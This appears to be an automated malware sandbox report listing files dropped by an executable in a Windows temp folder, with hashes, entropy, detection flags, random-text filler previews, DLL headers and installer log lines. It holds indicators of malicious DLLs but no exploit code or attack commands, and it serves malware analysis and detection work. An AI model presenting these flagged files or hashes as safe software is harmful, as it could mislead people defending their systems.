                                                                                                                                                                                                                            Preview:NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVPHWPWLYJIOFFNQHAOBSRORLXUKIHEETKPFDPHQAGTKOMEWPBYGMTXHOQFINPIQARIVGCFUFIETTFUMCUDHRHCSTIZWRDJEHWOLAFOSWAVIGSWONBSKFWHCQAGHLWBKAFUQUULJRVZNUGGVOCCVTTWZEZFPJKZDJMHDYXQKDPLRECPAAEZVBXFDGZJIUGNMOEAISGBSPVTDRADHODLAXUFWZVTJPIGKERLENNAJHHHNNAPBWXCOGJSNVQJJEEPSMESQKGYOHXVMZQNSMSJHQHSGCJZCBZJXMLGNQQKZRIQSQCAWXZFCRMGMMLKHZDWNQTXPTYWGWNQQEQWEZJPQVPOASQIIJYWPUVLHFSLMGHWITYEKRNYGXYTAJZSRGYUWTMRNOICIEPMAYUOIDDOUSYSPAILYQQLYDTBOTEDGSCNXDRRQMOBWCQMDCQXTPEXDKPLVRMFZSKERSAULAYLSOJGDMFTZECKZYYLQVVDOMXISCOBUPPSAYUFOWOCBDJALHRAXDIKEMRYGQMEYTENAHXKWSVJEDEJTIUWZDHLIBKQRVMQLSAYIIOZDWWOLHCJUVJVRYJLTIENWCTYDOSJVSFUHOQPOXCMFGTAWFRCZJNYBCRPUFRUMZIBQDOVOBMFCHMMFHSSJZDCZNMWNCNSQMZWHCOEYNCAFONSABBQCKAPFWJIGKNUCUJZWUKRWIOFVWQWFSYAHDWXEMJKFZYMRVIRAMPVKBXONBJFTXIBDAYIE
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.0.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                            Entropy (8bit):4.6980379859154695
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:A1cICRRGh4wXAyCbnhdKjiaeD+ICv1Ka42P:0cIYRGh4wXyny+VEV42P
                                                                                                                                                                                                                            MD5:4E3F4BE1B97FA984F75F11D95B1C2602
                                                                                                                                                                                                                            SHA1:C34EB2BF97AB4B0032A4BB92B9579B00514DC211
                                                                                                                                                                                                                            SHA-256:59176791FFEBB86CD28FF283F163F0A44BEC33273968AADFF3852F383F07D1E1
                                                                                                                                                                                                                            SHA-512:DD9C44C85AF10ED76900A2FE9289D28D99FB56CBE5385A46E485BE0F97A3EA7B119FE3235F334D84FA15902EA78F43C334424240B834D272849356421A33B207
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:QNCYCDFIJJXXFOBBXUZWOFUQSSNNMFYIDILWLHTAZLHLJONMCDCVNCVXWBMUFJZAFKEEPNXZDYZJCSPOAMORBEETMACWAZGGTOXJCHTDTMVBHRPTLBCYZORACSZOXJZRVMZHVEOODGKJRRYLCKUFAYOXVKWJMPRNRNPZEPQZONIUXPPIZMRKSMXAPWYEFYYMMEVAXOVEZSPBEJXENHLIHXQMWJRNUJFILZBVCHZGSXSCZDLUJYAIEMFAKMGZRGVOACZDULPMTHUOBPJBMVYTDCJXFDPUECDSDSUEAFWGDFBMYZQEFBBNQHNIAZWLZMSUFKUWZABFJATHSHQHDIAVRZTRYPZQQLMBOTPFBQKJDTMNKBJAFYFAYVOMBSWHOBUQSYEBLHEDVKQNGPPYYDHQTDNFMKYJBWQRTHICJRWSTTREOOBMYGBUCHFDYMGHVLBDKHYWLYGTEDTHOSIOSXLWGESBKVKNDNLHUVLLUBIQJIAQTVGZHJBFRBPSLHGPZGCZVLETNOSXQRRSQJBXTKDASBHEZXYVHEIZXGANNJHMIMQYHDFNNALGZYXGCPYFPYZSCSPKUMVVWIRDXSMSGEKGZNWWWVXGTXWDKSTXVLHRXFELLCWRSIFVJLOUVSMBXWSHSPQZUHHYPANCFLOAYKMMBXMIXYFORAFUEVNVTQFWGSCJZEOHRNDHLLFYLQFOZXARKDDGYWBOFNOCUJWZALYSUEUOMQHCYTBHPYEDSSAKKDECQAZIWWHOJPIMNYUNNZPDBNECENBWFCTSDYUMRCXDFCNYFVTFUUWRGBGWUGZTYCTBQVNAVSKZCNNOJNXDSQUTVJLYJMHLQJJBPEDZOTOVFCJLUVQVIEYTFNEEDHKMXTEKAIHTQBGOPUGKWWNQTAGBHAUZVKMHWVZTYKYOWJYFEGCIPREWFGAHFXDMSFOAYRDJCTSGYNSDSELZDMIXRNFGOTYBEUKLAOAVMHJKZEBGSCQHGCDZCAAGIVBGWEQA
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.0.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                            Entropy (8bit):4.6994061563025005
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                                                                                                                                                                            MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                                                                                                                                                                            SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                                                                                                                                                                            SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                                                                                                                                                                            SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.0.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                            Entropy (8bit):4.6994061563025005
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                                                                                                                                                                            MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                                                                                                                                                                            SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                                                                                                                                                                            SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                                                                                                                                                                            SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.0.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                            Entropy (8bit):4.698801429970146
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:qYZf7NYgK11E+8TKka0vEdKPG8TQZjtLMiMl+gc:Zk1k3a0Ma18Z4A
                                                                                                                                                                                                                            MD5:488BC4EF686937916ECE6285266A6075
                                                                                                                                                                                                                            SHA1:498BA8EBDA3DABD222532DB0C0D6262B0C5A7E08
                                                                                                                                                                                                                            SHA-256:8DEB161A95E22B50B1BD88EDBBB4312003788B8A6B35D22AEC02CC200FF34C17
                                                                                                                                                                                                                            SHA-512:1B7AC223F6277A74893597499F79D674E0798699081B0B2602123B9118E3F68815A951F787E71E5C35589E5AACF987E9C8F669FF9A9F6E94209F15DADEFF40A3
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:ZSSZYEFYMUQEKZVPQBMSGZPGFJSTPVKSKKYYOJJIVKJRXMBDCMKBNSXEZOYYLLCVGBCQCKVUSXHLTTLRBHPCNSEMRROKBXFGQJZTBAVNRJJQBKWQYWINUTDWXUKTWQTLFVKQJLRXVFMCOZRZYQJKBITZONPSKVFYGVFRXBDOVYHVEMAQOEYMKHGFIUSMUZFLKRKBNYFQULYASQJWIMXTPKLTXNGJEWMVSDMVYEHMDPUBWHXLMDGALITFYOPNEIQSZIFTQVUSLRLYPKRTXNKPZMOTSFMCTTCARDYTVYJNZYBYCYFEMWWKCHMOTEZUTCREBZPMVCXBYPYANERMGIWQGRLDPRJEURITRIHETMYHEDRHVZWCMDHNFFZGLKKJQGCRIABTVOOSCMRDMCYBMDQOGHUUZIQUDIGWJEDYSILALQBOBHJCJXMYCXWMKWTAZTAUZGCOOYTBWHVSAMUGEMKVHNGWYROVAEWXIOJKNUUAHUZJKSBJBZHYPRMGXULRNKCEDZBZFSCLCLARQDJMLPUKDSUWUIZMUDIKRKQZKQOXAYQYQTWHEIQXYYRXUJUIJQHETOHAPWXNCXFRKNXDPMNGFVZLBDFQUQRTHWUPUFFOEETFIAMWILGGLMPNTNBWFAVUGTBECKTLKLZQTWDYQGKSATWYWCKMJUIBSPWHFOXTNCPNZROSZPOSCRTUVGPSNZPJGXCOSDTDGNOFJGXANNYNPDRWRWHRMJKJZLEGOXMOOUXTCHTTXGYUQDVKJZMOUPMXIJCGGEIUPFMUDPJPVMINFDESCQIALHEUSISIOWESWYRPEKDPMSSUALHIWLZBLYGOHEFVJWNLRWWTIYJVKFFZJKDTZXWMWMLHMPMCDJASZUPRTYGWPHHTFMTSSQIBOUWXAGDKQACWGATARXNPCMQFCVREPARZFKWLUWYDUSCBVSUXEQBCXPUESWMVITZYZKPVGHRQVMKQXDEITVASTNPYLAQHWTYQQEBOGBVRUVAJ
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.0.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):685392
                                                                                                                                                                                                                            Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                            MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                            SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                            SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                            SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: JHqNlw9U8c.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: QPoX60yhZt.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: 3R18jv6iGv.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: YEnIrzZUUw.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: bUcIhJ4VHm.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: w3WOJ1ohgD.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                            Size (bytes):331
                                                                                                                                                                                                                            Entropy (8bit):5.199977312211888
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:BMKLt+MpjZtaAgrCYl7MpjOmLIYvgBtXSMpjlHB1JCTK7MpU1I0XY4eA:fxaXCY9mkYvgLXj/H73
                                                                                                                                                                                                                            MD5:2CBF9B5B56B01DE2F2D48C03A93ABA28
                                                                                                                                                                                                                            SHA1:E71C1379929453617B95C3DF1FEE9930DBB7BED5
                                                                                                                                                                                                                            SHA-256:725BADC18049128E97A88731162C44FD6BDDEA4FA3066D8045609A11407C4C6B
                                                                                                                                                                                                                            SHA-512:986A3F0DB971B796F6AE42A83440A6AE4CACAC6340F86AB8B0811FBC4415B275B215726A7938843E8D65D235952FEBB12B9D890343A259314771C10F0A473823
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:Bootstrap LogFile..-----------------..[26/04/2024 23:09:59]: Product System Mechanic Determined From 5488CB36-BE62-4606-B07B-2EE938868BD1..[26/04/2024 23:09:59]: This Brand IOLODEFAULT Not Detected As Installed..[26/04/2024 23:09:59]: No Supported Products Were Detected On This System..[26/04/2024 23:10:24]: Telemetry Data Sent..
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.3.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):346
                                                                                                                                                                                                                            Entropy (8bit):5.211023588565343
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:q0McTs0TCfk3VotGjZb34L0McoImQilo4MccM0TCfk3VotGjZb34L0MccQiQiloe:117TXVotgOL01o0iT1+TXVotgOL01zit
                                                                                                                                                                                                                            MD5:A18AB04FCA1EF0B4683BD03476C8D96B
                                                                                                                                                                                                                            SHA1:4882F4FB65D5E5330AF2D4FC8DE32D580CEB5DC0
                                                                                                                                                                                                                            SHA-256:EE9E4D0D322301A1CC0E129D26E829E2A40278207EAEF7284415E8AA1E02E12D
                                                                                                                                                                                                                            SHA-512:1FECDB237287A6F53E545E797119812B7ACD59E240BE4778B2B27605DB05E398506C8B50AA0AFC7080EBAC6D5EF50B78632AB399C04C258677D458861B4FAE2A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:[04/26/24 23:09:12] PerformGetOrPost : Attempting a POST on http://svc.iolo.com/__svc/sbv/DownloadManager.ashx...[04/26/24 23:09:13] IsValidCommunication : Result := True...[04/26/24 23:09:40] PerformGetOrPost : Attempting a POST on http://svc.iolo.com/__svc/sbv/DownloadManager.ashx...[04/26/24 23:09:40] IsValidCommunication : Result := True...
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.0.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):608080
                                                                                                                                                                                                                            Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                            MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                            SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                            SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                            SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: JHqNlw9U8c.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: QPoX60yhZt.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: 3R18jv6iGv.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: YEnIrzZUUw.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: bUcIhJ4VHm.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: w3WOJ1ohgD.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.0.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):450024
                                                                                                                                                                                                                            Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                            MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                            SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                            SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                            SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.0.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2046288
                                                                                                                                                                                                                            Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                            MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                            SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                            SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                            SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.0.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):257872
                                                                                                                                                                                                                            Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                            MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                            SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                            SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                            SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.0.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):80880
                                                                                                                                                                                                                            Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                            MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                            SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                            SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                            SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3::
                                                                                                                                                                                                                            MD5:93B885ADFE0DA089CDF634904FD59F71
                                                                                                                                                                                                                            SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                                                                                                                                                                                                                            SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
